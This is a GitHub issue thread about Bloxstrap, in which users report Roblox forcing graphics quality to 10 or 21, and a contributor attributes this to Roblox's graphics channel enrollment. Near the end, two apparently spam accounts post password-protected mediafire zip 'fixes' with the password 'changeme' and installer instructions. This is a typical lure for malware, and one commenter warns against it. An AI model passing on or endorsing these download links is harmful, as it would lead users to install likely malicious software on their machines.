### ISSUE TITLE
[BUG] roblox keeps forcefully putting my graphics quality to 10 or 21 without anything BUT old character sounds and the loader

### ISSUE THREAD

**Issue by Voxelizeds** [pizzaboxer/bloxstrap#2762]
### Acknowledgement of preliminary instructions

- [X] I have read the preliminary instructions, and I am certain that my problem has not already been addressed.
- [X] I have thoroughly looked through the available Wiki articles and could not find a solution to my problem.
- [X] I am using the latest version of Bloxstrap.
- [ ] I did not answer truthfully to all the above checkboxes.

### What problem did you encounter?

![image](https://github.com/user-attachments/assets/09609920-82a6-40f3-a5db-b001f3b62c6a)
![image](https://github.com/user-attachments/assets/bef747fc-e4ff-462e-901c-eb59db045207)
![image](https://github.com/user-attachments/assets/d46324f8-bb01-4131-a4dd-0a844272c587)
 

As you can see there IS no way i have a fast flag on that makes the graphics quality act this way when i uninstalled bloxstrap then there was NO issues like this if you can PLEASE try to fix this as i have a low end computer and while being an actual obbyist i CANT have this happen at all. Plus when i REINSTALL bloxstrap fresh then my roblox waits 10 seconds AND THEN goes back to 10 or 21 graphics quality

**Comment by hkm0ri** [comment]
ive had this too swear i was tweaking since jtoh would run at 60 fps and make it unplayable 😭😭

**Comment by KoaaBop** [comment]
I'm having this same issue too, but it randomly jumps graphic levels for me and it slows down randomly when it does that

**Comment by bluepilledgreat** [comment]
This seems to be happening due to the recent graphic optimisation channel enrollments. We can not do anything about which channels you are enrolled to. Please wait for Roblox to put you back on production.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Encythe** [comment]
Please don't do any of the above.
